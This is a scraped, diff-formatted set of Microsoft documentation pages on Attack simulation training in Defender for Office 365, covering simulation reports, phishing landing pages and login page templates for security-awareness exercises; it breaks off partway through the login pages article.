--- [Behavior impact on compromise rate card](attack-simulation-training-insights.md#behavior-impact-on-compromise-rate-card)-- [Training efficacy tab for the Attack simulation report](attack-simulation-training-insights.md#training-efficacy-tab-for-the-attack-simulation-report)-
-> [!TIP]
-> Attack Simulator uses Safe Links in Defender for Office 365 to securely track click data for the URL in the payload message that's sent to targeted recipients of a phishing campaign, even if the **Track user clicks** setting in Safe Links policies is turned off.
-
-## Training without tricks
-
-Traditional phishing simulations present users with suspicious messages and the following goals:
--- Get users to report the message as suspicious.-- Provide training after users click on or launch the simulated malicious payload and give up their credentials.-
-But, sometimes you don't want to wait for users to take correct or incorrect actions before you give them training. Attack simulation training provides the following features to skip the wait and go straight to training:
--- **Training campaigns**: A Training campaign is a training-only assignment for the targeted users. You can directly assign training without putting users through the test of a simulation. Training campaigns make it easy to conduct learning sessions like monthly cybersecurity awareness training. For more information, see [Training campaigns in Attack simulation training](attack-simulation-training-training-campaigns.md).--- **How-to Guides in simulations**: Simulations based on the **How-to Guide** social engineering technique don't attempt to test users. A How-to guide is a lightweight learning experience that users can view directly in their Inbox. For example, the following built-in **How-to Guide** payloads are available, and you can create your own (including [copying and customizing an existing payload](attack-simulation-training-payloads.md#copy-payloads)):
- - **Teaching guide: How to report phishing messages**
- - **Teaching Guide: How to recognize and report QR phishing messages**
security Attack Simulation Training Insights https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-insights.md
- Title: Insights and reports Attack simulation training------
- - m365-security
- - tier2
-
-description: Admins can learn how Attack simulation training in the Microsoft Defender portal affects users and can gain insights from simulation and training outcomes.
Previously updated : 3/14/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Insights and reports for Attack simulation training
--
-In Attack simulation training in Microsoft Defender for Office 365 Plan 2 or Microsoft 365 E5, Microsoft provides insights and reports from the results of simulations and the corresponding trainings. This information keeps you informed on the threat readiness progress of your users, and recommended next steps to better prepare your users for future attacks.
-
-Insights and reports are available in the following locations on the **Attack simulation training** page in the Microsoft Defender portal:
--- Insights:
- - The **Overview** tab at <https://security.microsoft.com/attacksimulator?viewid=overview>.
- - The **Reports** tab at <https://security.microsoft.com/attacksimulator?viewid=reports>.
-- Reports:
- - The **Attack simulation report** page at <https://security.microsoft.com/attacksimulationreport>:
- - [Training efficacy tab](#training-efficacy-tab-for-the-attack-simulation-report)
- - [User coverage tab](#user-coverage-tab-for-the-attack-simulation-report)
- - [Training completion tab](#training-completion-tab-for-the-attack-simulation-report)
- - [Repeat offenders tab](#repeat-offenders-tab-for-the-attack-simulation-report)
- - The reports for in-progress and completed simulations and training campaigns: For more information, see [Attack simulation report](#attack-simulation-report).
-
-The rest of this article describes the reports and insights for Attack simulation training.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-## Insights on the Overview and Reports tabs of Attack simulation training
-
-To go to the **Overview** tab, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training**:
--- **Overview** tab: Verify that the **Overview** tab is selected (it's the default). Or, to go directly to the **Overview** tab, use <https://security.microsoft.com/attacksimulator?viewid=overview>.-- **Reports** tab: Select the **Reports** tab. Or, to go directly to the **Reports** tab, use <https://security.microsoft.com/attacksimulationreport>.-
-The distribution of insights on the tabs is described in the following table:
-
-|Report|Overview tab|Reports tab|
-||::|::|
-|[Recent simulations card](#recent-simulations-card)|Γ£ö||
-|[Recommendations card](#recommendations-card)|Γ£ö||
-|[Simulation coverage card](#simulation-coverage-card)|Γ£ö|Γ£ö|
-|[Training completion card](#training-completion-card)|Γ£ö|Γ£ö|
-|[Repeat offenders card](#repeat-offenders-card)|Γ£ö|Γ£ö|
-|[Behavior impact on compromise rate card](#behavior-impact-on-compromise-rate-card)|Γ£ö|Γ£ö|
-
-The rest of this section describes the information that's available on the **Overview** and **Reports** tabs of Attack simulation training.
-
-### Recent simulations card
-
-The **Recent simulations** card on the **Overview** tab shows the last three simulations that you created or ran in your organization.
-
-You can select a simulation to view details.
-
-Selecting **View all simulations** takes you to the **Simulations** tab.
-
-Selecting **Launch a simulation** starts the new simulation wizard. For more information, see [Simulate a phishing attack in Defender for Office 365](attack-simulation-training-simulations.md).
--
-### Recommendations card
-
-The **Recommendations** card on the **Overview** tab suggests different types of simulations to run.
-
-Selecting **Launch now** starts the new simulation wizard with the specified simulation type automatically selected on the **Select technique** page. For more information, see [Simulate a phishing attack in Defender for Office 365](attack-simulation-training-simulations.md).
--
-### Simulation coverage card
-
-The **Simulation coverage** card on the **Overview** and **Reports** tabs shows the percentage of users in your organization who received a simulation (**Simulated users**) vs. users who didn't receive a simulation (**Non-simulated users**). You can hover over a section in the chart to see the actual number of users in each category.
-
-Selecting **View simulation coverage report** takes you to the [User coverage tab for the Attack simulation report](#user-coverage-tab-for-the-attack-simulation-report).
-
-Selecting **Launch simulation for non-simulated users** starts the new simulation wizard where the users who didn't receive the simulation are automatically selected on the **Target user** page. For more information, see [Simulate a phishing attack in Defender for Office 365](attack-simulation-training-simulations.md).
--
-### Training completion card
-
-The **Training completion** card on the **Overview** and **Reports** tabs organizes the percentages of users who received trainings based on the results of simulations into the following categories:
--- **Completed**-- **In progress**-- **Incomplete**-
-You can hover over a section in the chart to see the actual number of users in each category.
-
-Selecting **View training completion report** takes you to the [Training completion tab for the Attack simulation report](#training-completion-tab-for-the-attack-simulation-report).
--
-### Repeat offenders card
-
-The **Repeat offenders** card on the **Overview** and **Reports** tabs shows the information about repeat offenders. A _repeat offender_ is a user who was compromised by consecutive simulations. The default number of consecutive simulations is two, but you can change the value on the **Settings** tab of Attack simulation training at <https://security.microsoft.com/attacksimulator?viewid=setting>. For more information, see [Configure the repeat offender threshold](attack-simulation-training-settings.md#configure-the-repeat-offender-threshold).
-
-The chart organizes repeat offender data by [simulation type](attack-simulation-training-simulations.md#select-a-social-engineering-technique):
--- **All**-- **Malware Attachment**-- **Link to Malware**-- **Credential Harvest**-- **Link in attachments**-- **Drive-by URL**-
-Selecting **View repeat offender report** takes you to the [Repeat offenders tab for the Attack simulation report](#repeat-offenders-tab-for-the-attack-simulation-report).
--
-### Behavior impact on compromise rate card
-
-The **Behavior impact on compromise rate** card on the **Overview** and **Reports** tabs shows how your users responded to your simulations as compared to the historical data in Microsoft 365. You can use these insights to track progress in users threat readiness by running multiple simulations against the same groups of users.
-
-The chart data shows the following information:
--- **Actual compromise rate**: The actual percentage of people who were compromised by the simulation (actual users compromised / total number of users in your organization who received the simulation).-- **Predicted compromise rate**: Historical data across Microsoft 365 that predicts the percentage of people who will be compromised by this simulation. To learn more about the predicted compromise rate (PCR), see [Predicted compromise rate](attack-simulation-training-get-started.md#predicted-compromise-rate).-
-If you hover over a data point in the chart, the actual percentage values are shown.
-
-To see a detailed report, select **View simulations and training efficacy report**. This report is explained [later in this article](#training-efficacy-tab-for-the-attack-simulation-report).
--
-## Attack simulation report
-
-You can open the **Attack simulation report** from the **Overview** tab by selecting the **View ... report** actions that are available on some of the cards on the **Overview** and **Reports** tabs that are described in this article. To go directly to the **Attack simulation report** page, use <https://security.microsoft.com/attacksimulationreport>
-
-### Training efficacy tab for the Attack simulation report
-
-The **Training efficacy** tab is selected by default on the **Attack simulation report** page. This tab provides the same information that's available in the **Behavior impact on compromise rate** card, with additional context from the simulation itself.
--
-The chart shows the **Actual compromised rate** and the **Predicted compromise rate**. If you hover over a section in the chart, the actual percentage values for are shown.
-
-The details table below the chart shows the following information. You can sort the simulations by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Simulation name**-- **Simulation technique**-- **Simulation tactics**-- **Predicted compromised rate**-- **Actual compromised rate**-- **Total users targeted**-- **Count of clicked users**-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to filter the results by **Simulation name** or **Simulation Technique**. Wildcards aren't supported.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export report** button to save the information to a CSV file. The default filename is Attack simulation report - Microsoft Defender.csv, and the default location is the local Downloads folder. If an exported report already exists in that location, the filename is incremented (for example, Attack simulation report - Microsoft Defender (1).csv).
-
-### User coverage tab for the Attack simulation report
-
-On the **User coverage** tab, the chart shows the **Simulated users** and **Non-simulated users**. If you hover over a data point in the chart, the actual values are shown.
--
-The details table below the chart shows the following information. You can sort the information by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Username**-- **Email address**-- **Included in simulation**-- **Date of last simulation**-- **Last simulation result**-- **Count of clicked**-- **Count of compromised**-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to filter the results by **Username** or **Email address**. Wildcards aren't supported.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export report** button to save the information to a CSV file. The default filename is Attack simulation report - Microsoft Defender.csv, and the default location is the local Downloads folder. If an exported report already exists in that location, the filename is incremented (for example, Attack simulation report - Microsoft Defender (1).csv).
-
-### Training completion tab for the Attack simulation report
-
-On the **Training completion** tab, the chart shows the number of **Completed**, **In progress**, and **Incomplete** simulations. If you hover over a section in the chart, the actual values are shown.
--
-The details table below the chart shows the following information. You can sort the information by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Username**-- **Email address**-- **Included in simulation**-- **Date of last simulation**-- **Last simulation result**-- **Name of most recent training completed**-- **Date completed**-- **All trainings**-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the chart and details table by a **Status** values of the trainings: **Completed**, **In progress**, or **All**.
-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to filter the results by **Username** or **Email address**. Wildcards aren't supported.
-
-If you select the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export report** button, report generation progress is shown as a percentage of complete. In the dialog that opens, you can choose to open the .csv file, save the .csv file, and remember the selection.
-
-### Repeat offenders tab for the Attack simulation report
-
-A _repeat offender_ is a user who was compromised by consecutive simulations. The default number of consecutive simulations is two, but you can change the value on the **Settings** tab of Attack simulation training at <https://security.microsoft.com/attacksimulator?viewid=setting>. For more information, see [Configure the repeat offender threshold](attack-simulation-training-settings.md#configure-the-repeat-offender-threshold).
-
-On the **Repeat offenders** tab, the chart shows the number of **Repeat offender users** and **Simulated users**.
--
-If you hover over a data point in the chart, the actual values are shown.
-
-The details table below the chart shows the following information. You can sort the information by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **User**-- **Simulation types**-- **Simulations**-- **Email address**-- **Last repeat count**-- **Repeat offenses**-- **Last simulation name**-- **Last simulation result**-- **Last training assigned**-- **Last training status**-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the chart and details table by one or more simulation type values:
--- **Credential Harvest**-- **Malware Attachment**-- **Link in Attachment**-- **Link to Malware**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to filter the results by any of the column values. Wildcards aren't supported.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export report** button to save the information to a CSV file. The default filename is Attack simulation report - Microsoft Defender.csv, and the default location is the local Downloads folder. If an exported report already exists in that location, the filename is incremented (for example, Attack simulation report - Microsoft Defender (1).csv).
-
-## Simulation report in Attack simulation training
-
-The simulation report shows the details of in-progress or completed simulations (the **Status** value is **In progress** or **Completed**). To view the simulation report, use any of the following methods:
--- On the **Overview** tab of the **Attack simulation training** page at <https://security.microsoft.com/attacksimulator?viewid=overview>, select a simulation from the [Recent simulations card](#recent-simulations-card).-
- :::image type="content" source="../../media/attack-sim-training-overview-recent-simulations-card.png" alt-text="The Recent simulations card on the Overview tab in Attack simulation training in the Microsoft Defender portal." lightbox="../../media/attack-sim-training-overview-recent-simulations-card.png":::
--- On the **Simulations** tab of the **Attack simulation training** page at <https://security.microsoft.com/attacksimulator?viewid=simulations>, select a simulation by clicking anywhere in the row other than the check box next to the name. For more information, see [View simulation reports](attack-simulation-training-simulations.md#view-simulation-reports).-
- - On the **Training** tab of the **Attack simulation training** page at <https://security.microsoft.com/attacksimulator?viewid=trainingcampaign>, select the training campaign using either of the following methods:
- - Click anywhere in the row other than the check box next to the name.
- - Select the check box next to the name, and then select :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **View report**.
-
- For more information, see [View Training campaign reports](attack-simulation-training-training-campaigns.md#view-training-campaign-reports).
-
-The report page that opens contains **Report**, **Users, and **Details** tabs that contain information about the simulation. The rest of this section describes the insights and reports that are available on the **Report** tab.
-
-The sections on the **Report** tab for a simulation are described in the following subsections.
-
-For more information about the **Users** and **Details** tabs, see the following links.
--- Simulations:
- - [Users tab](attack-simulation-training-simulations.md#users-tab)
- - [Details tab](attack-simulation-training-simulations.md#details-tab)
-- Training campaigns:
- - [Users tab](attack-simulation-training-training-campaigns.md#users-tab)
- - [Details tab](attack-simulation-training-training-campaigns.md#details-tab)
-
-### Simulation report for simulations
-
-This section describes the information in the simulation report for regular simulations (not [Training campaigns](#simulation-report-for-training-campaigns)).
--
-#### Simulation impact section in the report for simulations
-
-The **Simulation impact** section on **Report** tab** for a simulation shows the number and percentage of **Compromised users** and **Users who reported** the message.
-
-If you hover over a section in the chart, the actual numbers for each category are shown.
-
-Select **View compromised users** to go to the [Users tab](attack-simulation-training-simulations.md#users-tab) tab in the report where the results are filtered by **Compromised: Yes**.
-
-Select **View users who reported** to go to the [Users tab](attack-simulation-training-simulations.md#users-tab) tab in the report where the results are filtered by **Reported message: Yes**.
--
-#### All user activity section in the report for simulations
-
-The **All user activity** section on **Report** tab** for a simulation shows numbers for the possible outcomes of the simulation. The information varies based on the simulation type. For example:
--- **Clicked message link** or **Attachment link clicked** or **Attachment opened**-- **Supplied credentials**-- **Read message**-- **Deleted message**-- **Replied to message**-- **Forwarded message**-- **Out of office**-
-Select **View all users** to go to the [Users tab](attack-simulation-training-simulations.md#users-tab) tab in the report where the results are unfiltered.
--
-#### Delivery status section in the report for simulations
-
-The **Delivery status** section on **Report** tab** for a simulation shows the numbers for the possible delivery statuses for the simulation message. For example:
--- **Successfully received message**-- **Positive reinforcement message delivered**-- **Just simulation message delivered-
-Select **View users to whom message delivery failed** to go to the [Users tab](attack-simulation-training-simulations.md#users-tab) tab in the report where the results are filtered by **Simulation message delivery: Failed to deliver**.
-
-Select **View excluded users or groups** to open an **Excluded users or groups** flyout that shows the users or groups that were excluded from the simulation.
--
-#### Training completion section in the report for simulations
-
-The **Training completion** section on the simulation details page shows the trainings that are required for the simulation, and how many users completed the trainings.
-
-If no trainings were included in the simulation, the only value in this section is **Trainings were not part of this simulation**.
--
-#### First & average instance section in the report for simulations
-
-The **First & average instance** section on **Report** tab** for a simulation shows information about the time it took to do specific actions in the simulation. For example:
--- **First link clicked**-- **Avg. link clicked**-- **First credential entered**-- **Avg. credential entered**--
-#### Recommendations section in the report for simulations
-
-The **Recommendations** section on **Report** tab** for a simulation shows recommendations for using Attack simulation training to help secure your organization.
--
-### Simulation report for Training campaigns
-
-This section describes the information in the simulation report for Training campaigns (not [simulations](#simulation-report-for-simulations)).
--
-#### Training completion classification section in the report for Training campaigns
-
-The **Training completion classification** section on **Report** tab** for a Training campaign shows information about the completed Training modules in the Training campaign.
--
-#### Training completion summary section in the report for Training campaigns
-
-The **Training completion summary** section on **Report** tab** for a Training campaign uses bar graphs show the progression of assigned users through all Training modules in the campaign (number of users / total number of users):
--- **Completed**-- **In progress**-- **Not started**-- **Not completed**-- **Previously assigned**-
-You can hover over a section in the chart to see the actual percentage in each category.
--
-#### All user activity section in the report for Training campaigns
-
-The **All user activity** section on **Report** tab** for a Training campaign uses a bar graph to shows how main people **Successfully received training notification** (number of users / total number of users).
-
-You can hover over a section in the chart to see the actual numbers in each category.
--
-## Related Links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Create a phishing attack simulation](attack-simulation-training-simulations.md)
-
-[create a payload for training your people](attack-simulation-training-payloads.md#create-payloads)
security Attack Simulation Training Landing Pages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-landing-pages.md
- Title: Landing pages in Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to create and manage landing pages for simulated phishing attacks in Microsoft Defender for Office 365 Plan 2.
Previously updated : 6/22/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Landing pages in Attack simulation training
-
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, landing pages are the web pages that users are taken to if they open the payload in the simulation.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To see the available landing pages, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Phish landing pages**. To go directly to the **Content library** tab where you can select **Phish landing pages**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-**Phish landing pages** in the **Content library** tab has two tabs:
--- **Global landing pages** tab: Contains built-in, unmodifiable landing page templates named **Microsoft Landing Page Template 1** to **Microsoft Landing Page Template 5**. These built-in landing pages are localized into 12+ languages.-- **Tenant landing pages** tab: Contains custom landing pages that you created.-
-The following information is shown for each landing page. You can sort the landing pages by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Name**-- **Γï«** (**Actions** control): Take action on the landing page. The available actions depend on the **Status** value of the landing page as described in the procedure sections.-- **Language**: One or more of the following values: **German**, **English**, **Spanish**, **French**, **Italian**, **Japanese**, **Korean**, **Dutch**, **Portuguese**, **Russian**, **Chinese (Simplified)**, and **Chinese (Traditional, Taiwan)**.-- **Default language**-- **Status**: **Ready** or **Draft**.-- **Linked simulations**-- **Created by**: For built-in landing pages, the value is **Microsoft**. For custom landing pages, the value is the user principal name (UPN) of the user who created the landing page.-- **Created time**-- **Modified by**-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> The **Γï«** (**Actions** control) is associated with the **Notifications** column. If you remove that column from view, the **Γï«** control goes away.
-
-To find a landing page in the list, type part of the landing page name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the landing pages by **Language** or **Status**.
-
-When you select a landing page from the list by clicking anywhere in the row other than the check box next to the name, a details flyout appears with the following information:
--- **Preview** tab: View the landing page as users see it. Use the **Select language** dropdown list to see the landing page in different languages.-- **Details** tab: View details about the landing page:
- - **Description**
- - **Status**: **Ready** or **Draft**.
- - **Landing page source**: For built-in landing pages, the value is **Global**. For custom landing pages, the value is **Tenant**.
- - **Modified by**
- - **Language**
- - **Last modified**
- - **Created by**
- - **Created time**
- - **Linked simulations**
- - **Default language**
-
-In custom landing pages only, an **Edit landing page** link is available at the bottom of both tabs.
-
-> [!TIP]
-> To see details about other landing pages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Create landing pages
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Phish landing pages**. To go directly to the **Content library** tab where you can select **Phish landing pages**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-2. On the **Tenant landing pages** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create new** to start the new landing page wizard.
-
- > [!NOTE]
- > At any point after you name the landing page during the new landing page wizard, you can select **Save and close** to save your progress and continue later. The incomplete landing page has the **Status** value **Draft**. You can pick up where you left off by selecting the landing page from the list and then clicking the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
- >
- > You can also create landing pages during the creation of simulations and simulation automations. For more information, see [Create a simulation: Select a landing page](attack-simulation-training-simulations.md#select-a-landing-page) and [Create a simulation automation: Select a landing page](attack-simulation-training-simulation-automations.md#select-a-landing-page).
-
-3. On the **Define details for phish landing page** page, configure the following settings:
- - **Name**: Enter a unique, descriptive name for the landing page.
- - **Description**: Enter an optional description.
-
- When you're finished on the **Define details for phish landing page** page, select **Next**.
-
-4. On the **Configure landing page** page, select **Define content in preferred language**. In the **Add content in default language** flyout that opens, configure the following settings:
- - **Select the language for the landing page**: Select one of the available languages: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **Dutch**, **English**, **Spanish**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese**, **Russian**, **Swedish**, **Norwegian Bokmål**, **Polish**, **Finnish**, **Turkish**, **Hungarian**, **Hebrew**, **Thai**, **Arabic**, **Vietnamese**, **Slovak**, **Greek**, **Indonesian**, **Romanian**, **Slovenian**, **Croatian**, **Catalan**, or **Other**.
- - **Mark this as default language**: For the first landing page you create, this setting is selected and unchangeable.
- - Landing page content: Two tabs are available:
- - **Text** tab: A rich text editor is available to create the landing page. To see the typical font and formatting settings, toggle **Formatting controls** to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**.
-
- The following controls are also available on the **Text** tab:
-
- - **Dynamic tag**: Select from the following tags:
-
- |Tag name|Tag value|
- |||
- |**Insert User name**|`${userName}`|
- |**Insert First name**|`${firstName}`|
- |**Insert Last name**|`${lastName}`|
- |**Insert UPN**|`${upn}`|
- |**Insert Email**|`${emailAddress}`|
- |**Insert Department**|`${department}`|
- |**Insert Manager**|`${manager}`|
- |**Insert Mobile phone**|`${mobilePhone}`|
- |**Insert City**|`${city}`|
- |**Insert sender name**|`${FromName}`|
- |**Insert sender email**|`${FromEmail}`|
- |**Insert Payload subject**|`${EmailSubject}`|
- |**Insert Payload content**|`${EmailContent}`|
- |**Insert Date**|`${date|MM/dd/yyyy|offset}`|
-
- - **Import from library**: Select an available template to start with. You can modify the text and layout in the editing area. To reset the landing page back to the default text and layout of the template, select **Reset to default**.
-
- - **Code** tab: You can view and modify the HTML code directly.
-
- You can preview the results by selecting **Preview phish landing page** at the top of the page.
-
- When you're finished on the **Add content in default language** flyout, select **Save**.
-
- Back on the **Configure landing page** page, the landing page you created is now listed. In the **Action** column, you can select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** or :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **Preview** to edit or view the landing page.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add translation** to create additional translations of the landing page in other languages.
-
- Other than the flyout title changing to **Add translation**, the same options are available as the **Add content in default language** flyout in the first landing page you created. Now the **Mark this as default language** check box is available to select. Only one translation of landing page can be the default language.
-
- When two or more translations of the landing page are listed on the **Configure landing page** page, the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** icon is available in the **Actions** column to delete any landing page translations that aren't designated as the default language.
-
- When you're finished on the **Configure landing page** page, select **Next**.
-
-5. On the **Review landing page** page, you can review your selections. Select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review landing page** page, select **Submit**, and then select **Done** on the confirmation page.
-
-6. Back on the **Tenant landing pages** tab of the **Select phish landing page**, select the landing page you created by selecting the check box next to the **Name**, and then select **Next**.
-
-## Modify landing pages
-
-You can't modify built-in landing pages on the **Global landing pages** tab. You can only modify custom landing pages on the **Tenant landing pages** tab.
-
-To modify an existing custom landing page on the **Tenant landing pages** tab, do one of the following steps:
--- Select the landing page from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.-- Select **Γï«** (**Actions**) next to the **Name** value of the landing page, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.-- Select the landing page from the list by clicking anywhere in the row other than the check box. In the details flyout that opens, select **Edit landing page** at the bottom of the flyout.-
-The landing page wizard opens with the settings and values of the selected landing page. The steps are the same as described in the [Create landing pages](#create-landing-pages) section.
-
-## Copy landing pages
-
-To copy an existing landing page on the **Tenant landing pages** or **Global landing pages** tabs, do one of the following steps:
--- Select the landing page from the list by clicking the check box, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Create a copy** action that appears.-- Select **Γï«** (**Actions**) next to the **Name** value of the landing page, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Create a copy**.-
-When you copy a custom landing page on the **Tenant landing pages** tab, a copy of the landing page named "\<OriginalName\> - Copy" is added to the list.
-
-When you copy a built-in landing page on the **Global landing pages** tab, a **Create copy** dialog appears. The dialog confirms that a copy of the landing page has been created, and is available on the **Tenant landing pages** tab. If you select **Go to Tenant landing page** you're taken to the **Tenant landing pages** tab, where the copied built-in landing page is named "\<OriginalName\> - Copy" is available. If you select **Stay here** in the dialog, you return to the **Global landing pages** tab.
-
-After the copy is created, you can modify it as [previously described](#modify-landing-pages).
-
-> [!TIP]
-> When you're creating or editing a landing page, the **Use from default** control on the **Text** tab of the **Add content in default language** step in the landing page wizard also allows you to copy the contents of a built-in landing page.
-
-## Remove landing pages
-
-You can't remove built-in landing pages from the **Global landing pages** tab. You can only remove custom landing pages on the **Tenant landing pages** tab. When you delete a landing page, all translations of the landing page are deleted.
-
-To remove an existing custom landing page from the **Tenant landing pages** tab, do one of the following steps:
--- Select the landing page from the list by clicking the check box next to the name, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.-- Select **Γï«** (**Actions**) next to the **Name** value of the landing page, and then select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete**.-
-In the confirmation dialog that opens, select **Delete**.
-
-## Related links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Create a phishing attack simulation](attack-simulation-training-simulations.md)
-
-[Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md)
security Attack Simulation Training Login Pages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-login-pages.md
- Title: Login pages in Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to create and manage login pages for simulated phishing attacks in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/11/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Login pages in Attack simulation training
-
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, login pages are shown to users in simulations that use **Credential Harvest** and **Link in Attachment** [social engineering techniques](attack-simulation-training-simulations.md#select-a-social-engineering-technique).
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To see the available login pages, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Login pages**. To go directly to the **Content library** tab where you can select **Login pages**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-**Login pages** in the **Content library** tab has two tabs:
--- **Global login pages** tab: Contains the built-in, unmodifiable login pages. There are four built-in login pages localized into 12+ languages:
- - **GitHub login page**
- - **LinkedIn login page**
- - **Microsoft login page**
- - **Non-branded login page**
--- **Tenant login pages** tab: Contains the custom login pages that you created.-
-The following information is shown for each login page. You can sort the login pages by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Name**-- **Γï«** (**Actions** control): Take action on the login page. The available actions depend on the **Status** value of the login page as described in the procedure sections.-- **Language**-- **Source**: For built-in login pages, the value is **Global**. For custom login pages, the value is **Tenant**.-- **Status**: **Ready** or **Draft**.-- **Created by**: For built-in login pages, the value is **Microsoft**. For custom login pages, the value is the UPN of the user who created the login page.-- **Last modified**-
-To find a login page in the list, type part of the login page name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the login pages by **Language** or **Status**.
-
-When you select a login page from the list by clicking anywhere in the row other than the check box next to the name, a details flyout appears with the following information:
